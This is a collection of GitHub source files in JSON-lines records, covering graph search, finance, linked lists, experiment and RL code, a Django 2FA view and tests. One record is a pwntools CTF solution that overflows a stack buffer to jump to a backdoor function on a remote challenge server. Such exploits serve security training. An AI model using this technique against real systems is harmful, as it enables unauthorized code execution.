':', self.adj_list[vertice])\n\n\ndef bfs(grafo, start, goal):\n visited = []\n fila = [[start]]\n while fila:\n path = fila.pop(0)\n ele = path[-1]\n\n if ele not in visited:\n vizinhos = grafo[ele]\n \n for vizinho in vizinhos:\n new_path = list(path)\n new_path.append(vizinho)\n fila.append(new_path)\n \n if vizinho == goal:\n print(len(new_path))\n return\n visited.append(ele)\n\n\nv = int(input())\na,b = input().split(',')\na = int(a)\nb = int(b)\nv_lista = []\n\nfor i in range(1, v+1):\n v_lista.append(i)\n\ng = Graph(v_lista)\n\nwhile a != -1:\n g.add_edge(a, b)\n a,b = input().split(',')\n a = int(a)\n b = int(b)\n \n\n\nbfs(g.adj_list, 1, v ) \n","repo_name":"Gama43/Estrutura-de-Dados","sub_path":"Busca BFS (Grafo).py","file_name":"Busca BFS (Grafo).py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42868350391","text":"#!/usr/bin/env python3\nimport yfinance as yf\nimport pandas as pd\n\n\ndef moving_average_calc(df, days, col=\"Close\"):\n if len(df) > days:\n close_col = df[[col]]\n close_last_100days = close_col.tail(days)\n\n # calculates the moving average over the last `days` closing prices\n moving_average = int(close_last_100days.sum()) / days\n\n return buy_sell_recommendation(df, moving_average)\n else:\n print(\"\\nData is not sufficient to calculate\")\n return None\n\n\ndef buy_sell_recommendation(df, ma):\n curr_closing_price = df[\"Close\"][-1] # current closing price\n\n if curr_closing_price >= ma:\n print(\"\\nCurrent price is over 100-day moving average -- Good time to buy shares!\")\n stock_above_sma.append(ticker)\n else:\n print(\"\\nCurrent price is under 100-day moving average -- You should sell some shares!\")\n stock_below_sma.append(ticker)\n\n\nstock_above_sma = [] # List of stocks above 100-day moving average\nstock_below_sma = [] # List of stocks below 100-day moving average\n\n# df = yf.download(ticker, period=\"1y\", interval=\"1d\")\nticker = 'AAPL'\nstock = yf.Ticker(ticker)\nhist = stock.history(period=\"6mo\")\ndf = pd.DataFrame(hist)\n\nma = moving_average_calc(df, days=100)\n","repo_name":"atran1015/stockportfolio","sub_path":"stock_strategy_A.py","file_name":"stock_strategy_A.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73653583932","text":"import linked_list as LinkedList\n\ndef swap_nodes(input_list, val1, val2):\n \n node1 = input_list.head_node\n node2 = input_list.head_node\n node1_prev = None\n node2_prev = None\n\n if val1 == val2:\n print('Elements are the same - no swap needed')\n return \n \n print(f'Swap {val1} with {val2}')\n\n while node1 is not None:\n if node1.get_value() == val1:\n break\n node1_prev = node1\n node1 = node1.get_next_node()\n\n while node2 is not None:\n if node2.get_value() == val2:\n break\n node2_prev = node2\n node2 = node2.get_next_node()\n \n if (node1 is None or node2 is None):\n print('Swap not possible - one or more elements are not in the list')\n return\n\n #this if statement checks if node1 is the head_node; if it is, input_list.head_node is assigned node2\n #if it's not, node1_prev's next node is set to node2\n if node1_prev is None:\n input_list.head_node = node2\n else:\n node1_prev.set_next_node(node2)\n\n #this if statement checks if node2 is the head_node; if it is, input_list.head_node is assigned node1\n #if it's not, node2_prev's next node is set to node1\n if node2_prev is None:\n input_list.head_node = node1\n else:\n node2_prev.set_next_node(node1)\n
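\n # Illustration (uses the demo list built below): swap_nodes(ll, 9, 5) swaps the\n # current head (9) with an interior node, so the input_list.head_node branch\n # above runs instead of a predecessor's set_next_node().\n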
\n #setting the new next node of node1 and node2\n temp = node1.get_next_node()\n\n node1.set_next_node(node2.get_next_node())\n node2.set_next_node(temp)\n\n\nll = LinkedList.LinkedList()\nfor i in range(10):\n ll.insert_beginning(i)\n\nprint(ll.stringify_list())\nswap_nodes(ll, 9, 5)\nprint(ll.stringify_list())","repo_name":"Adnunes/LinkedList","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15548231573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 29 23:03:51 2020\n\n@author: Praca\n\"\"\"\n\nfrom psychopy import core, visual\nfrom psychopy.hardware import keyboard\n\nimport pyxid2 as pyxid\n\nwin = visual.Window(\n size=[1920, 1080], fullscr=True, screen=0, \n winType='pyglet', allowGUI=False, allowStencil=False,\n monitor='testMonitor', color=[0.725,0.725,0.725], colorSpace='rgb',\n blendMode='avg', useFBO=True, \n units='pix')\n\ntext = visual.TextStim(win)\n\nkey = keyboard.Keyboard()\n\ndevices = pyxid.get_xid_devices()\ncore.wait(0.1)\ncedrus = devices[0]\n\nrun = True\n\nwhile run:\n text.draw()\n win.flip()\n \n cedrus.poll_for_response()\n if len(cedrus.response_queue):\n evt = cedrus.get_next_response()\n text.setText(evt['key'])\n \n char = key.getKeys()\n if char:\n if char[-1].name == 'escape':\n run = False\n else:\n text.setText(char[-1].name)\n\nwin.close()\ncore.quit()","repo_name":"COST-EEG/Gabor-Attention","sub_path":"components/cedrus_test.py","file_name":"cedrus_test.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70210146494","text":"import pytest\nfrom flask import current_app\nfrom logger.app import create_app\n\n\n@pytest.fixture(scope=\"module\")\ndef client():\n if not current_app:\n app = create_app()\n else:\n app = current_app\n app.testing = True\n with app.test_client() as client:\n yield client\n\n\n@pytest.mark.parametrize(\n \"endpoint,expected\",\n [\n (\"/search/browser/philippines\", 8),\n (\"/search/IE/philippines\", 31),\n ],\n)\ndef test_simple_search(client, endpoint, expected):\n res = client.get(endpoint)\n assert len(res.json) == expected\n\n\nqueries = [\n (\n {\"CONTAINS\": {\"message\": \"error\"}},\n 0,\n ),\n ({\"IS\": {\"browser\": \"chrome\"}}, 0),\n (\n {\"NOT\": {\"IS\": {\"country\": \"Brazil\"}}},\n 95,\n ),\n (\n {\n \"AND\": [\n {\"IS\": {\"browser\": \"Firefox\"}},\n {\"IS\": {\"country\": \"Philippines\"}},\n ]\n },\n 3,\n ),\n (\n {\n \"NOT\": {\n \"OR\": [\n {\n \"AND\": [\n {\"IS\": {\"browser\": \"Safari\"}},\n {\"IS\": {\"country\": \"Sweden\"}},\n ]\n },\n {\"CONTAINS\": {\"message\": \"Integer\"}},\n ]\n }\n },\n 85,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"test_input,expected\",\n queries,\n)\ndef test_query_logger(client, test_input, expected):\n response = client.get(\"/search/query\", json=test_input)\n assert len(response.json) == expected\n\n\n@pytest.mark.parametrize(\n \"test_input\",\n [\n {\"OPERATION_DOES_NOT_EXISTS\": {\"message\": \"error\"}},\n {\"CONTAINS\": {\"random_column\": \"error\"}},\n {\"AND\": {\"message\": \"error\"}},\n {\"AND\": [{\"message\": \"error\"}]},\n {\"AND\": []},\n {\"OR\": {\"browser\": \"Safari\"}},\n {\"OR\": [{\"browser\": \"Safari\"}]},\n {\"OR\": []},\n {\"NOT\": {\"NOT\": {\"country\": \"Brazil\"}}},\n {\"NOT\": [{\"IS\": {\"browser\": \"Safari\"}}, {\"IS\": {\"country\": \"Sweden\"}}]},\n ],\n)\ndef 
test_query_validation(client, test_input):\n response = client.get(\"/search/query\", json=test_input)\n assert response.status_code == 400\n","repo_name":"chicochico/cx-log-search","sub_path":"tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75129018811","text":"from .base import Environment, ClosedEnvironmentError\nfrom unityagents import UnityEnvironment\nfrom abc import abstractclassmethod, abstractproperty, abstractmethod\nfrom . import resources\nimport os\nfrom .base import IntInterval, CartesianProduct,\\\n FloatInterval, MultiEnvironmentMixin\nimport numpy as np\n\nclass UnityBasedEnvironment(Environment):\n '''\n A severe limitation of the UnityEnvironment in unityagents is that only one can be instantiated in \n a given Python process and it is incompatible with the multiprocessing package, perhaps due to its \n use of gRPC (see https://github.com/Unity-Technologies/ml-agents/issues/956).\n \n Somehow, the nose module's multiprocess plugin works around these issues, but I don't understand how \n and can't recreate it. Therefore, only one UnityBasedEnvironment can be instantiated in the entire \n history of a particular Python process.\n '''\n @abstractclassmethod\n def path(self):\n '''\n Subclasses should set this to be the path to the \n desired Unity environment.\n '''\n \n # It's necessary for UnityEnvironments to have unique worker_ids. We can \n # ensure no two environments in a process share the same worker id by keeping\n # a count.\n worker_count = 0\n \n def __del__(self):\n UnityBasedEnvironment.worker_count -= 1\n \n def __init__(self, graphics=False):\n # Attempt to make worker_id differ across processes. 
Obviously not guaranteed,\n # especially if each process has multiple workers.\n worker_id = (os.getpid() % 100) + UnityBasedEnvironment.worker_count\n self.env = UnityEnvironment(\n file_name=self.path, \n no_graphics=(not graphics),\n worker_id=worker_id,\n# docker_training=True,\n )\n UnityBasedEnvironment.worker_count += 1\n self.brain_name = self.env.brain_names[0]\n self.brain = self.env.brains[self.brain_name]\n env_info = self.env.reset(train_mode=True)[self.brain_name]\n example_state = env_info.vector_observations[0]\n self._state_size = len(example_state)\n self._n_actions = self.brain.vector_action_space_size\n self.closed = False\n \n def reset(self, train):\n if self.closed:\n raise ClosedEnvironmentError('Environment is already closed.')\n env_info = self.env.reset(train_mode=train)[self.brain_name]\n return np.array(env_info.vector_observations)\n \n @abstractmethod\n def transform_action(self, action):\n pass\n \n def step(self, action):\n if self.closed:\n raise ClosedEnvironmentError('Environment is already closed.')\n env_info = self.env.step(self.transform_action(action))[self.brain_name]\n state = np.array(env_info.vector_observations)\n reward = np.array(env_info.rewards)\n done = np.array(env_info.local_done)\n return state, reward, done\n \n def close(self):\n if self.closed:\n return\n self.env.close()\n self.closed = True\n \nclass BananaEnvironment(UnityBasedEnvironment):\n path = resources.banana\n \n def transform_action(self, action):\n return action\n \n @property\n def action_space(self):\n return CartesianProduct([IntInterval(0, self._n_actions - 1)])\n \n @property\n def state_space(self):\n return CartesianProduct([FloatInterval()] * 37)\n\nclass ReacherEnvironmentBase(UnityBasedEnvironment):\n def transform_action(self, action):\n return np.tanh(action)\n\nclass ReacherV1Environment(ReacherEnvironmentBase):\n path = resources.reacher_v1\n \n @property\n def action_space(self):\n return CartesianProduct([FloatInterval()] * 4)\n \n @property\n def state_space(self):\n return CartesianProduct([FloatInterval()] * 33)\n \nclass ReacherV2Environment(ReacherEnvironmentBase, MultiEnvironmentMixin):\n path = resources.reacher_v2\n def __init__(self, graphics=False):\n UnityBasedEnvironment.__init__(self, graphics=graphics)\n \n @property\n def action_space(self):\n return CartesianProduct([[FloatInterval()] * 4] * 20)\n\n @property\n def state_space(self):\n return CartesianProduct([[FloatInterval()] * 33] * 20)\n","repo_name":"jcrudy/drlnd_p2","sub_path":"ppo/environment/unity_adapter.py","file_name":"unity_adapter.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29200527640","text":"import numpy as np\nfrom FlowModelFuncs import TransientFlowModel\nfrom ParticleModelFuncs import vector_arrows, cell_cnc_tracker, calc_export\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom BuildGlacier import Glacier\nfrom PlottingTools import plotFigures\n\n# time is measured in DAYS.\n# since we are simulating an unconfined aquifer, the \n# hydraulic head is equal to the water table height \n# above sea level\n\n\"\"\"\nHydraulic head calculations:\n\nInitial hydraulic head is calculated from elevation \nabove sea level of the weathering crust lower boundary\nand the initial water table height above the lower \nsurface. 
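(For illustration with the defaults set\nbelow - base_elevation = 100 m, WC_thickness0 = 5 m, WaterTable0 = 0.2 - the\nwater table initially sits 1 m above the lower boundary, i.e. at about 101 m\na.s.l.) 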
This gives the hydraulic head at the water table,\nbut we calculate head and flow at a given resolution \nwithin the water table, so the head must be calculated\nfor each vertical step as defined by the WC_thickness \nand cell_spacing_z (so for a 5m thick WC and a vertical\nresolution of 1m, 5 hydraulic head values are required). \nThis is achieved using the equation:\n\n# h = psi + z \n\n# where h = hydraulic head, psi = pressure head (i.e. \n# the elevation difference between the measurement point \n# and the water table), and z = elevation at the measurement\n# point. These calculated hydraulic heads are \n# added to the appropriate layer of HI and the initial \n# heads are thus defined.\n\nTODO: calculate volume lost to surface runoff\n\"\"\"\n\n\n# program config\nsavepath = '/home/joe/Code/FlowModel/Outputs/'\ndatapath = '/home/joe/Code/FlowModel/Data/'\nepsilon = 0.67\nplot_types = [\"Q\",\"BBA\",\"Cell Export at Terminus\",\\\n\"Cumulative Cell Export at Terminus\"] \n\n# select what to plot, options are Q (net inflow to cells), \n# Qs (water released from storage), \n# Qx (flow across lateral cell boundaries)\n# Qy (flow across longitudinal cell boundaries), \n# Phi (hydraulic head at cell centres), \n# BBA (broadband albedo).\n# Provide as list of strings or set to \"None\".\n\nplot_layer = 0 # which vertical layer to plot (0 = top, -1 = bottom)\nfigsize = (15, 15)\nt = np.arange(0, 100, 10) # time to run model over in days\nlat = 67.04 # site latitude\nlon = 49.99 # site longitude\nday = 202 # day of year\ntime = 1500 # time of day (24hr)\n\n# grid size\nlength = 100\nwidth = 100\nWC_thickness0 = 5 # initial WC thickness at t=0\ncell_spacing_xy = 1 # size of cells in meters in horizontal dimension\ncell_spacing_z = 1 # size of cells in meters in vertical dimension\nx = np.arange(0, width, cell_spacing_xy)\ny = np.arange(0, length, cell_spacing_xy)\nz = np.arange(0, WC_thickness0, cell_spacing_z)\nkxy = 3.15\nkz = 0.75\n\n# environmental variables\nslope = 3 # topographic slope from upper to lower boundary, 1 = lose as much height as horizontal distance\naspect = 180 # degrees, N is 0\nroughness = 0.005 # default is 0.005\nbase_elevation = 100 # raise entire surface this far above sea level\nWaterTable0 = 0.2 # proportion of WC filled with water at t=0\nmelt_rate0 = 0.001 # water added by melting in m3/d\nrainfall0 = 0 # water added by rainfall in m3/d\nloss_at_edges = 2 # extraction rate at glacier sides m3/d\nloss_at_terminus = 20 # extraction rate at glacier terminus\ncryoconite_coverage = 0.02 # fraction of total surface covered by cryoconite holes\nmoulin_location = None #((50,60),(50,60)) # give cell indices for horizontal extent in 1st tuple, vertical extent in 2nd tuple, or set to None\nmoulin_extr_rate = 200 #rate of extraction via moulin, m3/d\nstream_location = None #((0,-10),(20,30))\nconstrain_head_to_WC = True # toggling this ON means the hydraulic head cannot rise above the upper glacier surface nor drop below the lower WC boundary\nporosity0 = 0.3 # initial porosity in each cell\nspecific_retention = 0.05 # tunable, describes the proportion of water left behind after the aquifer drains - set to the value for fine gravel from Bear et al (1973)\nMELT_CALCS = True # toggle whether to initiate the albedo-melt-porosity feedback calculations\nalgal_coverage = [65,0,0,20,10,10] # % coverage of each algal concentration from clean to 100000ppb - must add to 100%\n\n# meteorological variables\nlapse = 0.65 \nwindspd = 0.5 \nairtemp = 1\ninswrd = 65 \navp = 900 \n\n#microbial variables\ncell0 = 
1000 # initial cell concentration in cell/mL\ncellG = 0.6 # growth rate\ncellD = 0.3 # death rate\n\n# BUILD GLACIER\nglacier = Glacier(x, y, z, cell_spacing_xy, cell_spacing_z,\\\n base_elevation, WC_thickness0, porosity0, specific_retention,\\\n WaterTable0, cryoconite_coverage, melt_rate0, rainfall0, slope,\\\n kxy, kz, loss_at_edges, loss_at_terminus, stream_location,\\\n moulin_location, moulin_extr_rate, algal_coverage, lat, lon, day,\\\n time, aspect, roughness, lapse, windspd, airtemp, inswrd, avp)\n\n# CALCULATE FLOWS\nOut, porosity = TransientFlowModel(x, y, z, t, glacier, epsilon, constrain_head_to_WC,\\\n rainfall0, MELT_CALCS, moulin_location, datapath)\n\n# CALCULATE COMPONENT VECTORS\nX, Y, Z, U, V, W = vector_arrows(Out, x, y, z, plot_layer)\n\n# CALCULATE CELL FLUXES\nCells, CellColumnTot = cell_cnc_tracker(Out, U, V, W, t, cell0, cellG, cellD,\\\n glacier.SHP, glacier.cryoconite_locations)\n\n# SUMMARISE CELL FLUXES\nTotalExport, CumExport = calc_export(CellColumnTot)\n\n# PLOT FIGURES\nplotFigures(x, y, z, plot_types, Out, t, plot_layer, Cells, CellColumnTot,\\\n TotalExport, CumExport, figsize, savepath)","repo_name":"jmcook1186/FlowModel","sub_path":"FlowModelDriver.py","file_name":"FlowModelDriver.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18216405045","text":"from django.utils import timezone\nfrom datetime import timedelta\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom ..permissions import IsAuthenticated\n\nfrom ..models import Duo\nfrom ..app_settings import NewDuoSerializer, ActivateDuoSerializer, DeleteDuoSerializer\nfrom ..utils import encrypt_with_db_secret\nfrom ..authentication import TokenAuthentication\n\nclass UserDuo(GenericAPIView):\n\n authentication_classes = (TokenAuthentication, )\n permission_classes = (IsAuthenticated,)\n serializer_class = NewDuoSerializer\n allowed_methods = ('GET', 'PUT', 'DELETE', 'OPTIONS', 'HEAD')\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Checks the REST Token and returns a list of all duos\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return: 200\n :rtype:\n \"\"\"\n\n duos = []\n\n for duo in Duo.objects.filter(user=request.user).all():\n duos.append({\n 'id': duo.id,\n 'active': duo.active,\n 'title': duo.title,\n })\n\n return Response({\n \"duos\": duos\n },\n status=status.HTTP_200_OK)\n\n def put(self, request, *args, **kwargs):\n \"\"\"\n Checks the REST Token and sets a new duo for multifactor authentication\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return: 201 / 400\n :rtype:\n \"\"\"\n\n serializer = NewDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n title = serializer.validated_data.get('title')\n use_system_wide_duo = serializer.validated_data.get('use_system_wide_duo')\n duo_integration_key = serializer.validated_data.get('integration_key')\n duo_secret_key = serializer.validated_data.get('secret_key')\n duo_host = serializer.validated_data.get('host')\n enrollment_user_id = serializer.validated_data.get('enrollment_user_id')\n enrollment_activation_code = serializer.validated_data.get('enrollment_activation_code')\n validity_in_seconds = 
serializer.validated_data.get('validity_in_seconds')\n\n if use_system_wide_duo:\n new_duo = Duo.objects.create(\n user = request.user,\n title = 'System wide',\n duo_integration_key = '',\n duo_secret_key = encrypt_with_db_secret(''),\n duo_host = '',\n enrollment_user_id = enrollment_user_id,\n enrollment_activation_code = enrollment_activation_code,\n enrollment_expiration_date = timezone.now() + timedelta(seconds=validity_in_seconds),\n active=False\n )\n else:\n new_duo = Duo.objects.create(\n user = request.user,\n title = title,\n duo_integration_key = duo_integration_key,\n duo_secret_key = encrypt_with_db_secret(duo_secret_key),\n duo_host = duo_host,\n enrollment_user_id = enrollment_user_id,\n enrollment_activation_code = enrollment_activation_code,\n enrollment_expiration_date = timezone.now() + timedelta(seconds=validity_in_seconds),\n active=False\n )\n\n return Response({\n \"id\": new_duo.id,\n \"activation_code\": new_duo.enrollment_activation_code,\n },\n status=status.HTTP_201_CREATED)\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n Validates a duo and activates it\n\n :param request:\n :type request:\n :param args:\n :type args:\n :param kwargs:\n :type kwargs:\n :return:\n :rtype:\n \"\"\"\n\n serializer = ActivateDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n duo = serializer.validated_data.get('duo')\n\n # activate it\n duo.active = True\n duo.save()\n\n request.user.duo_enabled = True\n request.user.save()\n\n return Response(status=status.HTTP_200_OK)\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n Deletes a duo\n\n :param request:\n :param args:\n :param kwargs:\n :return: 200 / 400\n \"\"\"\n\n serializer = DeleteDuoSerializer(data=request.data, context=self.get_serializer_context())\n\n if not serializer.is_valid():\n\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n duo = serializer.validated_data.get('duo')\n duo_count = serializer.validated_data.get('duo_count')\n\n # Update the user attribute if we only had 1 duo\n if duo_count < 2 and duo.active:\n request.user.duo_enabled = False\n request.user.save()\n\n # delete it\n duo.delete()\n\n return Response(status=status.HTTP_200_OK)\n","repo_name":"psono/psono-server","sub_path":"psono/restapi/views/user_duo.py","file_name":"user_duo.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"78"} +{"seq_id":"41797630929","text":"informations={\n 'first_name':'zhangsan',\n 'last_name':'zhanghua',\n 'age':'23',\n 'city':'shanghai',\n }\nprint(informations)\nprint(\"\\n\")\n\n\nfriends={\n 'james':6,\n 'paul':3,\n 'harden':13,\n 'jordan':23,\n 'kobe':24,\n }\nprint(friends)\nprint(\"\\n\")\n\n\nvocabularys={\n 'upper':'converts the whole string to uppercase',\n 'lower':'converts the whole string to lowercase',\n 'title':'capitalizes the first letter of each word',\n 'strip':'trims both ends of the string',\n 'lstrip':'trims the left end of the string',\n }\nprint(vocabularys)\n\n","repo_name":"shenjinrong0901/python_work","sub_path":"学习阶段历程/homework6.2.py","file_name":"homework6.2.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29871394806","text":"# created by Илья Данилов\r\n# date 18.09.2021\r\n# description: inserting a character\r\n\r\ntry:\r\n wordStr, newWordStr = input().strip(), ''\r\n for x in wordStr:\r\n newWordStr += x + '*'\r\n print(newWordStr[:-1])\r\nexcept 
ValueError:\r\n print('Value error')\r\nexcept TypeError:\r\n print('Type error')\r\n","repo_name":"Qiwi636/Python_tasks","sub_path":"HW_2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14551290735","text":"from pwn import *\n\ncontext(arch='amd64', os='linux', log_level='debug')\n# io = process('./bjdctf_2020_babystack')\nio = remote('node4.buuoj.cn', 29417)\ne = ELF('./bjdctf_2020_babystack')\nio.sendlineafter(b'Please input the length of your name:', b'100')\nbackdoor_address = e.symbols['backdoor'] # 0x4006E6\nlog.success('backdoor_address => %s' % hex(backdoor_address))\npayload = b'a'*0x10 + b'fuckpwn!' + p64(backdoor_address)\nio.sendlineafter(b'What\\'s u name?', payload)\nio.interactive()","repo_name":"Don2025/CTFwriteUp","sub_path":"BUUCTF/bjdctf_2020_babystack.py","file_name":"bjdctf_2020_babystack.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"78"} +{"seq_id":"37313922852","text":"\"\"\"\nWandb compatible plotting functions\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom coffea import hist\nfrom io import BytesIO\nfrom PIL import Image\nimport wandb\n\n_NORM_LIST = [LogNorm(vmax=10000, vmin=0.1), LogNorm(vmax=10000 , vmin=0.1), LogNorm(vmax=10, vmin=0.1)]\n\ndef plot_calo_images(layer_images):\n image_list = []\n for idx in range(layer_images[0].shape[0]):\n image_list.append(plot_calo_image([layer_image[idx] for layer_image in layer_images]))\n return image_list\n \ndef plot_calo_image(image):\n fig, ax = plt.subplots(nrows=1, ncols=len(image), figsize=(12, 4))\n plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.45, hspace=None)\n \n for layer, axe in enumerate(fig.axes):\n im = axe.imshow(image[layer], aspect='auto', origin='upper', norm=_NORM_LIST[layer])\n axe.set_title('Layer ' + str(layer), fontsize=10)\n axe.tick_params(labelsize=10)\n \n axe.set_yticks(np.arange(0, image[layer].shape[0], 1))\n axe.set_xlabel(r'$\\phi$ Cell ID', fontsize=10)\n axe.set_ylabel(r'$\\eta$ Cell ID', fontsize=10)\n \n if layer == 0:\n axe.set_xticks(np.arange(0, image[layer].shape[1], 10))\n else:\n axe.set_xticks(np.arange(0, image[layer].shape[1], 1))\n \n cbar = fig.colorbar(im, ax=axe)\n cbar.set_label('Energy, (MeV)', fontsize=10)\n cbar.ax.tick_params(labelsize=10)\n \n buf = BytesIO()\n plt.savefig(buf, format='png', dpi=500)\n buf.seek(0)\n image = wandb.Image(Image.open(buf))\n buf.close()\n plt.close(fig)\n \n return image","repo_name":"ezeeEric/DiVAE","sub_path":"utils/plotting/plotCalo.py","file_name":"plotCalo.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"20367832008","text":"\"\"\"A simple checker for types of functions in treatment_functions.py.\"\"\"\n\nimport io\nimport sys\nfrom typing import Callable, Dict, List\nsys.path.insert(0, 'pyta')\nimport python_ta\nimport treatment_functions as tf\n\n\n##### Generic functions #####\n\ndef type_error_message(func_name: str, expected: str, got: str) -> str:\n \"\"\"Return an error message for function func_name returning type got,\n where the correct return type is expected.\n \"\"\"\n\n return ('{} should return a {}, but returned {}' +\n '.').format(func_name, expected, got)\n\n\ndef check_function(func: Callable, args: list, 
ret_type: type) -> None:\n \"\"\"Check that func called with arguments args returns a value of type\n ret_type. Display the progress and the result of the check.\n \"\"\"\n\n print('Checking {}...'.format(func.__name__))\n got = func(*args)\n assert isinstance(got, ret_type), \\\n type_error_message(func.__name__, ret_type.__name__, type(got))\n print(' check complete')\n\n\ndef check_type_details(assertion: bool, func_name: str, expected: str,\n got: str) -> None:\n \"\"\"Check that assertion is True. Display the progress and the result\n of the check. Failure means that function func_name was expected\n to return expected, but returned a value whose str representation\n is got.\n\n Useful when the return type is, for example, a nested list or a\n complex dict.\n\n \"\"\"\n\n print('Checking {}...'.format(func_name))\n assert assertion, type_error_message(func_name, expected, got)\n print(' check complete')\n\n\n###############\n\nprint('=====================================================================')\nprint('=====================================================================')\nprint('=====================================================================')\nprint('==================== Start: checking coding style ===================')\n\npython_ta.check_all('treatment_functions.py', config='pyta/a3_pyta.txt')\n\nprint('=================== End: checking coding style ====================\\n')\n\n\nprint('== Start: checking whether initial values of constants are modified ==')\n\n# Get the initial values of the constants\nCONSTS_BEFORE = [\n tf.NA, tf.TREATMENT, tf.PATIENT_ID_INDEX, tf.NAME_TO_VALUE,\n tf.ID_TO_ATTRIBUTES, tf.VALUE_TO_IDS, tf.ID_TO_SIMILARITY]\n\nprint('Check whether the constants are unchanged from the starter code.')\n\nassert CONSTS_BEFORE == ['NA', 'Treatment', 0, Dict[str, str],\n Dict[str, Dict[str, str]], Dict[str, List[str]],\n Dict[str, float]],\\\n ('You have modified the value of some constant(s). 
Edit your code so that'\n + ' the values of constants are the same as in the starter code.')\n\nprint(' check complete')\n\nprint('== End: checking whether initial values of constants are modified ==\\n')\n\n\nprint('============ Start: checking parameter and return types ============')\n\nd = {\n 'tcga.5l.aat0': {\n 'Age': '42', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm0',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'A'},\n 'tcga.5l.aat1': {\n 'Age': 'NA', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm1',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'B'}\n}\np = {'Age': '42', 'Gender': 'female', 'Tumor_Size': 't2',\n 'Nearby_Cancer_Lymphnodes': 'n0', 'Cancer_Spread': 'm0',\n 'Histological_Type': '1', 'Lymph_Nodes': '0', 'Treatment': 'A'}\n\n########### read_patients_dataset\ndata = ('Patient_ID\\tAge\\tGender\\tTumor_Size\\tNearby_Cancer_Lymphnodes\\t'\n 'Cancer_Spread\\tHistological_Type\\tLymph_Nodes\\tTreatment\\n'\n 'tcga.5l.aat0\\t42\\tfemale\\tt2\\tn0\\tm0\\t1\\t0\\tA\\n'\n 'tcga.5l.aat1\\tNA\\tfemale\\tt2\\tn0\\tm1\\t1\\t0\\tB')\n\ndata_io = io.StringIO(data)\nactual = tf.read_patients_dataset(data_io)\ncheck_type_details(\n isinstance(actual, dict) and 'tcga.5l.aat0' in actual and\n isinstance(actual['tcga.5l.aat0'], dict) and\n 'Gender' in actual['tcga.5l.aat0'] and\n isinstance(actual['tcga.5l.aat0']['Gender'], str),\n 'read_patients_dataset(a non-empty file)',\n 'a non-empty Dict[str, Dict[str, str]]',\n actual)\n\n########## build_value_to_ids\nactual = tf.build_value_to_ids(d, 'Gender')\ncheck_type_details(\n isinstance(actual, dict) and 'female' in actual and\n isinstance(actual['female'], list) and actual['female'] != [] and\n isinstance(actual['female'][0], str),\n 'build_value_to_ids',\n 'a non-empty Dict[str, List[str]] with a non-empty value',\n actual)\n\n######### patients_with_missing_values\nactual = tf.patients_with_missing_values(d, 'Age')\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 'patients_with_missing_values',\n 'a non-empty List[str]',\n actual)\n\n######### similarity_score\ncheck_function(tf.similarity_score, [d['tcga.5l.aat0'], p], float)\n\n######### patient_similarities\nactual = tf.patient_similarities(d, p)\ncheck_type_details(\n isinstance(actual, dict) and 'tcga.5l.aat0' in actual and\n isinstance(actual['tcga.5l.aat0'], float),\n 'patient_similarities',\n 'a non-empty Dict[str, float]',\n actual)\n\n######### patients_by_similarity\nactual = tf.patients_by_similarity(d, p)\ncheck_type_details(\n isinstance(actual, list) and actual != [] and isinstance(actual[0], str),\n 